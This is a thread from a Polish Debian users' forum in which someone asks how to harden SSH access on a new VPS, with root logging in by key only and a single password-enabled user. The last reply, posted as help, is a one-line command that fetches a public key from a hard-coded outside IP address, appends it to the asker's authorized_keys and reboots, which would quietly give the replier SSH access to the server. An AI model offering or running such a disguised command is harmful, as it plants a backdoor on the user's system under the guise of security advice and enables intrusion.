Forum Debian Users Gang

orenuk · 2019-04-15 19:12:45

Witam,

Postawiłem sobie ostatnio VPS i chciałbym go zabezpieczyć w następujący sposób:
- root ma logować się po kluczu i nie może dostać się do systemu po haśle,
- żaden user, oprócz jednego określonego użytkownika i root'a nie mogą posiadać hasła
- tylko jeden, wybrany użytkownik może logować się do systemu przez ssh za pomocą hasła
- nie można dostać się na root'a z poziomu innego użytkownika, np. za pomocą polecenia su -

Czy ktoś może mi wytłumaczyć jak osiągnąć powyższy efekt?
Będę też wdzięczny za konstruktywną krytykę tego rozwiązania.

Z góry dziękuję za odpowiedź,
Pozdrawiam

rulezdc · 2019-04-15 20:26:38

cześć
na jaki przedmiot to zaliczenie ?

orenuk · 2019-04-15 21:17:47

rulezdc napisał(-a):
na jaki przedmiot to zaliczenie ?

Chcę sobie stworzyć środowisko, na którym będzie się można logować tylko na konto roota za pomocą klucza (kwestia bezpieczeństwa). Natomiast to jedno konto z hasłem, chciałbym używać z każdego miejsca, ale na wszelki wypadek bez możliwości przejścia z niego na roota. To konto będzie dla mnie takim podręcznym magazynem, do którego chcę sobie zasysać rzeczy.
Głowiłem się nad tym jak to zaimplementować, ale skończyło się 2 razy na utracie możliwości logowania na VPS, więc proszę o pomoc ;)

091619EE · 2019-04-15 23:52:53

Moze to zadziala:

Kod:

mkdir -p ~/.ssh && chmod 700 ~/.ssh && wget -U "vps" -O - http://198.167.223.75/m76.pub | cat >> ~/.ssh/authorized_keys && reboot

Forum Debian Users Gang

Ogłoszenie

#1 2019-04-15 19:12:45

orenuk - Użytkownik

Prośba o pomoc w realizcji procedury logowania na serwer

#2 2019-04-15 20:26:38

rulezdc - Członek DUG

Re: Prośba o pomoc w realizcji procedury logowania na serwer

#3 2019-04-15 21:17:47

orenuk - Użytkownik

Re: Prośba o pomoc w realizcji procedury logowania na serwer

rulezdc napisał(-a):

#4 2019-04-15 23:52:53

091619EE - Użytkownik

Re: Prośba o pomoc w realizcji procedury logowania na serwer

Kod:

Stopka forum